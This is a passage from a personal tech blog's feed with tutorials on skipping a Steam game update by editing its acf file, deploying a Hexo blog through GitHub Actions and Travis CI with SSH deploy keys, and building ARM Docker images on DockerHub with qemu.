paste the <code>appid</code> in.</p><p><img src="/pictures/skip-steam-update/search.png" alt="search"></p><p>Open the <code>History</code> tab.</p><p><img src="/pictures/skip-steam-update/history.png" alt="history"></p><p>Find <code>timeupdated</code> <code>buildid</code> <code>maxsize</code> <code>manifests</code> and note down the values highlighted in green.</p><p><img src="/pictures/skip-steam-update/changelist.png" alt="changelist"></p><h2 id="4-修改acf文件"><a href="#4-修改acf文件" class="headerlink" title="4.修改acf文件"></a>4. Edit the acf file</h2><h3 id="修改前要先完全关闭steam"><a href="#修改前要先完全关闭steam" class="headerlink" title="修改前要先完全关闭steam"></a>Close Steam completely before editing</h3><p><img src="/pictures/skip-steam-update/modify.png" alt="modify"></p><p>Change <code>StateFlags</code> to <code>4</code>, then overwrite the original values one by one with the values copied above.</p><pre><code>timeupdated -> LastUpdated
buildid -> buildid
manifests -> manifest
maxsize -> size</code></pre><p>Save, then start Steam again. Done.</p>]]></content>
<summary type="html"><p><img src="/pictures/skip-steam-update/head.png" alt="head"></p>
<p>I bought Beatsaber, and every time Steam updates the game the plugins I installed stop working, yet without updating, the game cannot be launched...</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
</entry>
<entry>
<title>Automatically deploying Hexo with GitHub Actions</title>
<link href="https://thinkalone.win/hexo-on-action.html"/>
<id>https://thinkalone.win/hexo-on-action.html</id>
<published>2020-12-26T13:00:00.000Z</published>
<updated>2020-12-26T13:00:00.000Z</updated>
<content type="html"><![CDATA[<p><img src="/pictures/hexo-on-action/head.png"></p><p>In 2019 I set up Travis CI automatic builds for the blog; a few days ago I went to publish a post, and one <code>git push</code> after writing it, the blog broke.</p><span id="more"></span><h2 id="Hexo"><a href="#Hexo" class="headerlink" title="Hexo"></a>Hexo</h2><p>First, your Hexo must already be set up in your local environment and able to run <code>hexo g</code> normally.</p><h2 id="生成-配置秘钥"><a href="#生成-配置秘钥" class="headerlink" title="生成&配置秘钥"></a>Generating & configuring keys</h2><p>Use <code>ssh-keygen</code> to generate a key pair:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ssh-keygen -t ed25519 -C "Hexo Deploy Key" -f github-deploy-key</span><br></pre></td></tr></table></figure><p>Just press Enter; do not set a passphrase.</p><p>On GitHub, open <code>Repository -> Settings -> Secrets</code> and add a secret: set <code>Name</code> to <code>HEXO_DEPLOY_KEY</code> and paste the <strong>private key</strong> generated above into <code>Value</code>.</p><p><img src="/pictures/hexo-on-action/new.png"></p><p><img src="/pictures/hexo-on-action/new-ok.png"></p><p>Open <code>Repository -> Settings -> Deploy keys</code> and add a key: set <code>Title</code> to <code>HEXO_DEPLOY_PUB</code>, paste the <strong>public key</strong> generated above into <code>Key</code>, and tick <code>Allow write access</code> below it.</p><p><img src="/pictures/hexo-on-action/new-key.png"></p><h2 id="准备文件"><a href="#准备文件" class="headerlink" title="准备文件"></a>Preparing the files</h2><p>Create an empty branch and copy these files & folders from your existing hexo source directory:</p><ul><li><input checked="" disabled="" type="checkbox"> scaffolds</li><li><input checked="" disabled="" type="checkbox"> source</li><li><input checked="" disabled="" type="checkbox"> themes</li><li><input checked="" disabled="" type="checkbox"> _config.yml (hexo's)</li><li><input checked="" disabled="" type="checkbox"> package.json</li></ul><h2 id="修改配置文件"><a href="#修改配置文件" class="headerlink" title="修改配置文件"></a>Modifying the configuration</h2><p>To keep the blog from breaking later when a theme or hexo update arrives after a long period without maintenance, set the theme up as a submodule.</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git submodule add https://github.com/JoeyBling/hexo-theme-yilia-plus themes/yilia</span><br></pre></td></tr></table></figure><p>At the end of _config.yml, add a <code>theme_config:</code> entry.</p><p>Reference: <a href="https://blog.xxwhite.com/2020/blog-ci.html#%E4%B8%BB%E9%A2%98%E5%AD%90%E6%A8%A1%E5%9D%97%E5%8C%96">https://blog.xxwhite.com/2020/blog-ci.html#%E4%B8%BB%E9%A2%98%E5%AD%90%E6%A8%A1%E5%9D%97%E5%8C%96</a></p><p><img src="/pictures/hexo-on-action/config.png"></p><h2 id="配置Workflow"><a href="#配置Workflow" class="headerlink" title="配置Workflow"></a>Configuring the workflow</h2><p>Create a new file: <code>.github/workflows/deploy.yml</code></p><figure class="highlight yaml"><figcaption><span>.github/workflows/deploy.yml</span></figcaption><table><tr><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">Hexo</span> <span class="string">Deploy</span></span><br><span class="line"></span><br><span class="line"><span class="attr">on:</span></span><br><span class="line">  <span class="attr">push:</span></span><br><span class="line">    <span class="attr">branches:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">source</span> <span class="comment">#the monitored branch; a change on this branch triggers the workflow</span></span><br><span class="line"></span><br><span class="line"><span class="attr">jobs:</span></span><br><span class="line">  <span class="attr">build:</span></span><br><span class="line">    <span class="attr">runs-on:</span> <span class="string">ubuntu-18.04</span></span><br><span class="line">    <span class="attr">if:</span> <span class="string">github.event.repository.owner.id</span> <span class="string">==</span> <span class="string">github.event.sender.id</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">steps:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Checkout</span> <span class="string">source</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">actions/checkout@v2</span></span><br><span class="line">        <span class="attr">with:</span></span><br><span class="line">          <span class="attr">ref:</span> <span class="string">source</span> <span class="comment">#the branch holding the hexo source files</span></span><br><span class="line"></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Setup</span> <span class="string">Node.js</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">actions/setup-node@v1</span></span><br><span class="line">        <span class="attr">with:</span></span><br><span class="line">          <span class="attr">node-version:</span> <span class="string">'12'</span></span><br><span class="line"></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Setup</span> <span class="string">Hexo</span></span><br><span class="line">        <span class="attr">env:</span></span><br><span class="line">          <span class="attr">ACTION_DEPLOY_KEY:</span> <span class="string">${{ secrets.HEXO_DEPLOY_KEY }}</span></span><br><span class="line">        <span class="attr">run:</span> <span class="string">|</span></span><br><span class="line"><span class="string">          mkdir -p ~/.ssh/</span></span><br><span class="line"><span class="string">          echo "$ACTION_DEPLOY_KEY" > ~/.ssh/id_ed25519</span></span><br><span class="line"><span class="string">          chmod 700 ~/.ssh</span></span><br><span class="line"><span class="string">          chmod 600 ~/.ssh/id_ed25519</span></span><br><span class="line"><span class="string">          ssh-keyscan github.com >> ~/.ssh/known_hosts</span></span><br><span class="line"><span class="string">          git config --global user.email "disappear9@outlook.com" #email used for git commits</span></span><br><span class="line"><span class="string">          git config --global user.name "Disappear9" #user name used for git commits</span></span><br><span class="line"><span class="string">          npm install hexo-cli -g</span></span><br><span class="line"><span class="string">          npm install</span></span><br><span class="line"><span class="string">          git submodule update --init --recursive #fetch the submodule</span></span><br><span class="line"><span class="string">          rm themes/yilia/_config.yml #delete the theme's bundled config file</span></span><br><span class="line"><span class="string">          chmod +x deploy.sh</span></span><br><span class="line"><span class="string"></span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Deploy</span></span><br><span class="line">        <span class="attr">run:</span> <span class="string">|</span></span><br><span class="line"><span class="string">          hexo g</span></span><br><span class="line"><span class="string">          ./deploy.sh</span></span><br></pre></td></tr></table></figure><p>Because deploying with <code>hexo d</code> makes the git commits look ugly, the deployment is written into a script, <code>deploy.sh</code> (placed in the root of the newly created branch).</p><figure class="highlight bash"><figcaption><span>deploy.sh</span></figcaption><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">set</span> -ev</span><br><span class="line"><span class="built_in">export</span> TZ=<span class="string">'Asia/Shanghai'</span></span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> --depth=1 -b master git@github.com:{username}/{repository}.git .deploy_git <span class="comment">#replace with your own</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> .deploy_git</span><br><span class="line">git checkout master</span><br><span class="line"><span class="built_in">mv</span> .git/ ../public/</span><br><span class="line"><span class="built_in">cd</span> ../public</span><br><span class="line"></span><br><span class="line">git add .</span><br><span class="line">git commit -m <span class="string">"Site updated: `date +"</span>%Y-%m-%d %H:%M:%S<span class="string">"`"</span></span><br><span class="line">git push origin master:master --force </span><br></pre></td></tr></table></figure><h2 id="加个Badge"><a href="#加个Badge" class="headerlink" title="加个Badge"></a>Adding a badge</h2><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source"><img src="https://github.com/Disappear9/disappear9.github.io/workflows/Hexo%20Deploy/badge.svg" alt="Build Status"></a></p><p>Reference: <a href="https://docs.github.com/cn/actions/managing-workflow-runs/adding-a-workflow-status-badge">https://docs.github.com/cn/actions/managing-workflow-runs/adding-a-workflow-status-badge</a></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">https://github.com/<OWNER>/<REPOSITORY>/workflows/Hexo%20Deploy/badge.svg</span><br></pre></td></tr></table></figure><h2 id="完"><a href="#完" class="headerlink" title="完"></a>Done</h2><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source">https://github.com/Disappear9/disappear9.github.io/tree/source</a><br>Feel free to use it as a reference.</p>]]></content>
<summary type="html"><p><img src="/pictures/hexo-on-action/head.png"></p>
<p>In 2019 I set up Travis CI automatic builds for the blog; a few days ago I went to publish a post, and one <code>git push</code> after writing it, the blog broke.</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Automatically building a Hexo blog with Travis CI</title>
<link href="https://thinkalone.win/Travis-CI-Hexo.html"/>
<id>https://thinkalone.win/Travis-CI-Hexo.html</id>
<published>2019-02-06T04:44:30.000Z</published>
<updated>2019-02-06T04:44:30.000Z</updated>
<content type="html"><![CDATA[<h2 id="配置-GitHub-仓库"><a href="#配置-GitHub-仓库" class="headerlink" title="配置 GitHub 仓库"></a>配置 GitHub 仓库</h2><p><strong>注意:以下全部操作尽量不要在Windows系统下操作</strong><br>建立一个source分支,放入<code>scaffolds</code> <code>source</code> <code>themes</code>文件夹和<code>_config.yml</code> <code>package.json</code>文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mkdir source</span><br><span class="line">cd source</span><br><span class="line">git init</span><br><span class="line">git remote add origin git@github.com:Disappear9/disappear9.github.io.git</span><br><span class="line">git checkout --orphan source</span><br><span class="line">git add .</span><br><span class="line">git commit -m "Initial commit"</span><br><span class="line">git push origin source:source</span><br></pre></td></tr></table></figure><p>创建 <code>.travis.yml</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">language: node_js</span><br><span class="line">node_js: stable</span><br></pre></td></tr></table></figure><h2 id="配置-Travis-CI"><a href="#配置-Travis-CI" class="headerlink" title="配置 Travis CI"></a>配置 Travis CI</h2><p>用Github登录并且关联项目</p><h3 id="配置Deploy-keys"><a href="#配置Deploy-keys" class="headerlink" title="配置Deploy keys"></a>配置Deploy keys</h3><p>让Travis CI可以push到你的仓库</p><span id="more"></span><p>生成一个 ssh 密钥对:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-keygen -t ed25519 -f 
travis.key</span><br></pre></td></tr></table></figure><p>把travis.key.pub中的内容粘贴到Deploy keys<br><img src="/pictures/Travis-CI-HEXO/Deploykeys.png"></p><h3 id="加密私匙"><a href="#加密私匙" class="headerlink" title="加密私匙"></a>加密私匙</h3><p>总不能把私匙直接放项目里把?<br><strong>下面第一个坑来了:</strong><br>我们需要安装 Travis 的命令行工具</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt install ruby</span><br><span class="line">$ sudo gem install travis</span><br></pre></td></tr></table></figure><p><strong>瞬间报错</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ERROR: Error installing ffi:</span><br><span class="line"> ERROR: Failed to build gem native extension.</span><br></pre></td></tr></table></figure><p>Google了一圈,缺依赖,安上:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install ruby-dev curl</span><br></pre></td></tr></table></figure><p>好了,能正常运行了<br>登录 Travis 并加密文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 如果是私有项目要加 --pro 参数</span><br><span class="line">$ travis login --auto</span><br><span class="line"># 加密完成后会在当前目录下生成 travis.key.enc 文件</span><br><span class="line">$ travis encrypt-file travis.key -add</span><br></pre></td></tr></table></figure><p>如果使用Windows系统,到这一步就会各种报错,官方甚至直接把这条<a href="https://docs.travis-ci.com/user/encrypting-files/#caveat">写进了文档</a>,说明不要在Windows系统下操作</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Caveat #</span><br><span class="line">There is a report of this function not working on a local Windows machine. Please use the WSL (Windows Subsystem for Linux) or a Linux or macOS machine</span><br></pre></td></tr></table></figure><p>加密完成后把travis.key.enc放进travis文件夹,查看.travis.yml会发现多了这样一行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl aes-256-cbc -K $encrypted_************_key -iv $encrypted_************_iv </span><br><span class="line"> -in .travis/travis.key.enc -out ~/.ssh/id_rsa -d</span><br></pre></td></tr></table></figure><p>其中的<code>$encrypted_************_key</code>和<code>iv</code>应该会被自动添加到Travis的环境变量<br>然而在我这里并没有</p><p><strong>然后就是第二个坑</strong><br>你需要在运行<code>$ travis encrypt-file travis.key -add</code>时加上 –debug参数,这样工具就会打印出API日志,其中value长度为32位的是iv,更长的是key,然后手动把他们加入到Travis的环境变量(添加的时候不要把前面的$符号打进去,不然又是报错)(手贱这一下我调了半天没找到错误在那……)</p><h2 id="编写-travis-yml"><a href="#编写-travis-yml" class="headerlink" title="编写 .travis.yml"></a>编写 .travis.yml</h2><figure class="highlight yaml"><figcaption><span>.travis.yml</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">language:</span> <span class="string">node_js</span></span><br><span class="line"><span class="attr">node_js:</span> <span class="string">stable</span></span><br><span class="line"><span class="attr">branches:</span></span><br><span class="line"> <span class="attr">only:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">source</span></span><br><span class="line"></span><br><span class="line"><span class="attr">cache:</span></span><br><span class="line"> <span class="attr">yarn:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">directories:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">node_modules</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">themes</span></span><br><span class="line"><span class="comment"># Add github.com as a trusted host, otherwise git push will fail</span></span><br><span class="line"><span class="attr">addons:</span></span><br><span class="line"> <span class="attr">ssh_known_hosts:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">github.com</span></span><br><span class="line"></span><br><span class="line"><span class="attr">before_install:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">openssl</span> <span class="string">aes-256-cbc</span> <span class="string">-K</span> <span class="string">$encrypted_************_key</span> <span class="string">-iv</span> <span class="string">$encrypted_************_iv</span> <span 
class="string">-in</span> <span class="string">travis/travis.key.enc</span> <span class="string">-out</span> <span class="string">~/.ssh/id_ed25519</span> <span class="string">-d</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">chmod</span> <span class="number">600</span> <span class="string">~/.ssh/id_ed25519</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">git</span> <span class="string">config</span> <span class="string">--global</span> <span class="string">user.name</span> <span class="string">"Disappear9"</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">git</span> <span class="string">config</span> <span class="string">--global</span> <span class="string">user.email</span> <span class="string">"disappear9@outlook.com"</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">chmod</span> <span class="string">+x</span> <span class="string">travis/deploy.sh</span></span><br><span class="line"></span><br><span class="line"><span class="attr">install:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">yarn</span></span><br><span class="line"></span><br><span class="line"><span class="attr">script:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">hexo</span> <span class="string">clean</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">hexo</span> <span class="string">generate</span></span><br><span class="line"><span class="comment"># Use deploy.sh to git commit + git push</span></span><br><span class="line"><span class="attr">after_success:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">travis/deploy.sh</span></span><br></pre></td></tr></table></figure><p>deploy.sh (put it in the travis folder)</p><figure class="highlight bash"><figcaption><span>deploy.sh</span></figcaption><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">set</span> -ev</span><br><span class="line"><span class="built_in">export</span> TZ=<span class="string">'Asia/Shanghai'</span></span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> --depth=1 -b master git@github.com:Disappear9/disappear9.github.io.git .deploy_git</span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> .deploy_git</span><br><span class="line">git checkout master</span><br><span class="line"><span class="built_in">mv</span> .git/ ../public/</span><br><span class="line"><span class="built_in">cd</span> ../public</span><br><span class="line"></span><br><span class="line">git add .</span><br><span class="line">git commit -m <span class="string">"Site updated: `date +"</span>%Y-%m-%d %H:%M:%S<span class="string">"`"</span></span><br><span class="line">git push origin master:master --force</span><br></pre></td></tr></table></figure><p>After completing the steps above, your directory should look like this<br><img src="/pictures/Travis-CI-HEXO/finish.png"></p><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source">https://github.com/Disappear9/disappear9.github.io/tree/source</a><br>Feel free to use it as a reference</p><p>When done, run <code>git push origin source:source</code> and Travis CI will start building</p><h2 id="参考链接:"><a href="#参考链接:" class="headerlink" title="参考链接:"></a>References:</h2><p><a 
href="https://blessing.studio/deploy-hexo-blog-automatically-with-travis-ci/">https://blessing.studio/deploy-hexo-blog-automatically-with-travis-ci/</a><br><a href="https://segmentfault.com/a/1190000013286548">https://segmentfault.com/a/1190000013286548</a></p>]]></content>
<summary type="html"><h2 id="配置-GitHub-仓库"><a href="#配置-GitHub-仓库" class="headerlink" title="配置 GitHub 仓库"></a>Configure the GitHub repository</h2><p><strong>Note: avoid doing any of the following on Windows where possible</strong><br>Create a source branch and put the <code>scaffolds</code> <code>source</code> <code>themes</code> folders and the <code>_config.yml</code> <code>package.json</code> files into it</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mkdir source</span><br><span class="line">cd source</span><br><span class="line">git init</span><br><span class="line">git remote add origin git@github.com:Disappear9/disappear9.github.io.git</span><br><span class="line">git checkout --orphan source</span><br><span class="line">git add .</span><br><span class="line">git commit -m &quot;Initial commit&quot;</span><br><span class="line">git push origin source:source</span><br></pre></td></tr></table></figure>
<p>Create <code>.travis.yml</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">language: node_js</span><br><span class="line">node_js: stable</span><br></pre></td></tr></table></figure>
<h2 id="配置-Travis-CI"><a href="#配置-Travis-CI" class="headerlink" title="配置 Travis CI"></a>Configure Travis CI</h2><p>Sign in with GitHub and link the project</p>
<h3 id="配置Deploy-keys"><a href="#配置Deploy-keys" class="headerlink" title="配置Deploy keys"></a>Configure Deploy keys</h3><p>This lets Travis CI push to your repository</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Making DockerHub Autobuild build images for ARM and other architectures</title>
<link href="https://thinkalone.win/Docker-ARM.html"/>
<id>https://thinkalone.win/Docker-ARM.html</id>
<published>2018-12-12T05:37:46.000Z</published>
<updated>2018-12-12T05:37:46.000Z</updated>
<content type="html"><![CDATA[<h2 id="起因:"><a href="#起因:" class="headerlink" title="起因:"></a>Background:</h2><p>I have recently been using <a href="https://github.com/Vector000/bilive_client">bilive_client</a> to run Bilibili live-stream and main-site daily tasks unattended. Recompiling on every update and managing the node environment was too much trouble, so I started using Docker</p><h2 id="遇到的坑:"><a href="#遇到的坑:" class="headerlink" title="遇到的坑:"></a>Pitfalls encountered:</h2><p>First, a Google search turned up <a href="https://github.com/docker/hub-feedback/issues/1261">https://github.com/docker/hub-feedback/issues/1261</a> and the example <a href="https://github.com/davidecavestro/mariadb-docker-armhf">https://github.com/davidecavestro/mariadb-docker-armhf</a>. Following them, create a hooks folder in the same directory as the Dockerfile and put <code>post_checkout</code> and <code>pre_build</code> in it</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hooks</span><br><span class="line">|——pre_build</span><br><span class="line">|——post_checkout</span><br><span class="line">Dockerfile</span><br></pre></td></tr></table></figure><figure class="highlight bash"><figcaption><span>pre_build</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">docker run --<span class="built_in">rm</span> --privileged multiarch/qemu-user-static:register --reset</span><br></pre></td></tr></table></figure><figure class="highlight bash"><figcaption><span>post_checkout</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">curl -L https://github.com/balena-io/qemu/releases/download/v3.0.0%2Bresin/qemu-3.0.0+resin-arm.tar.gz | tar zxvf - -C . 
&& <span class="built_in">mv</span> qemu-3.0.0+resin-arm/qemu-arm-static .</span><br></pre></td></tr></table></figure><p>Then add one line to the Dockerfile</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">COPY qemu-arm-static /usr/bin</span><br></pre></td></tr></table></figure><p><strong>It did absolutely nothing, though</strong></p><span id="more"></span><p>Checking the log, Autobuild reported <code>no such a file or dictionary</code> (confused-face meme.jpg), which was a headache<br>More Googling showed that someone had already reported this: <a href="https://forums.docker.com/t/resolved-automated-docker-build-fails/22831">https://forums.docker.com/t/resolved-automated-docker-build-fails/22831</a>. Docker confirmed it as a bug and it was marked as resolved (confused-face meme.jpg again)<br><strong>Resolved, my foot?</strong></p><p>With no other option, I went straight to a two-stage build<br>First put <code>qemu-***-static</code> into the project; for ARMv8 64-bit use <code>qemu-aarch64-static</code></p><figure class="highlight dockerfile"><figcaption><span>Dockerfile</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Any image works here since it does not affect the final output image; I use alpine. If you use debian-stretch you need to adapt what follows yourself</span></span><br><span class="line"><span class="keyword">FROM</span> alpine AS builder</span><br><span class="line"></span><br><span class="line"><span 
class="keyword">MAINTAINER</span> Disappear9</span><br><span class="line"><span class="comment"># Download qemu with wget rather than git to speed up the build</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apk --no-cache add unzip \</span></span><br><span class="line"><span class="language-bash"> && wget https://github.com/Disappear9/bilive_client_docker/archive/master.zip \</span></span><br><span class="line"><span class="language-bash"> && unzip master.zip \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">mkdir</span> /qemu \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">cp</span> bilive_client_docker-master/qemu/* /qemu \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">rm</span> master.zip \</span></span><br><span class="line"><span class="language-bash"><span class="comment"># Download the code to be compiled</span></span></span><br><span class="line"> && wget https://github.com/lzghzr/bilive_client/archive/master.zip \</span><br><span class="line"> && unzip master.zip \</span><br><span class="line"> && mkdir /app \</span><br><span class="line"> && mv bilive_client-master/* /app</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">FROM</span> arm32v6/node:alpine AS release</span><br><span class="line"><span class="comment"># Copy qemu from builder into /usr/bin. It is a good idea to copy the code to be compiled in directly as well, which keeps the layers tidier.</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> --from=builder /qemu/qemu-arm-static /usr/bin</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> --from=builder /app /app</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Finally, here is the GitHub repository: <a href="https://github.com/Disappear9/bilive_client_docker">https://github.com/Disappear9/bilive_client_docker</a> Feel free to use it as a reference<br>DockerHub repository: <a 
href="https://hub.docker.com/r/disappear9/bilive_client">https://hub.docker.com/r/disappear9/bilive_client</a></p><h2 id="还有一些问题"><a href="#还有一些问题" class="headerlink" title="还有一些问题"></a>Some remaining problems</h2><p>Autobuild is only triggered by a push on GitHub, which is awkward: when the upstream source is updated it has to be triggered manually...</p>]]></content>
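<summary type="html"><h2 id="起因:"><a href="#起因:" class="headerlink" title="起因:"></a>Background:</h2><p>I have recently been using <a href="https://github.com/Vector000/bilive_client">bilive_client</a> to run Bilibili live-stream and main-site daily tasks unattended. Recompiling on every update and managing the node environment was too much trouble, so I started using Docker</p>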
<h2 id="遇到的坑:"><a href="#遇到的坑:" class="headerlink" title="遇到的坑:"></a>Pitfalls encountered:</h2><p>First, a Google search turned up <a href="https://github.com/docker/hub-feedback/issues/1261">https://github.com/docker/hub-feedback/issues/1261</a> and the example <a href="https://github.com/davidecavestro/mariadb-docker-armhf">https://github.com/davidecavestro/mariadb-docker-armhf</a>. Following them, create a hooks folder in the same directory as the Dockerfile and put <code>post_checkout</code> and <code>pre_build</code> in it</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hooks</span><br><span class="line">|——pre_build</span><br><span class="line">|——post_checkout</span><br><span class="line">Dockerfile</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><figcaption><span>pre_build</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">docker run --<span class="built_in">rm</span> --privileged multiarch/qemu-user-static:register --reset</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><figcaption><span>post_checkout</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">curl -L https://github.com/balena-io/qemu/releases/download/v3.0.0%2Bresin/qemu-3.0.0+resin-arm.tar.gz | tar zxvf - -C . &amp;&amp; <span class="built_in">mv</span> qemu-3.0.0+resin-arm/qemu-arm-static .</span><br></pre></td></tr></table></figure>
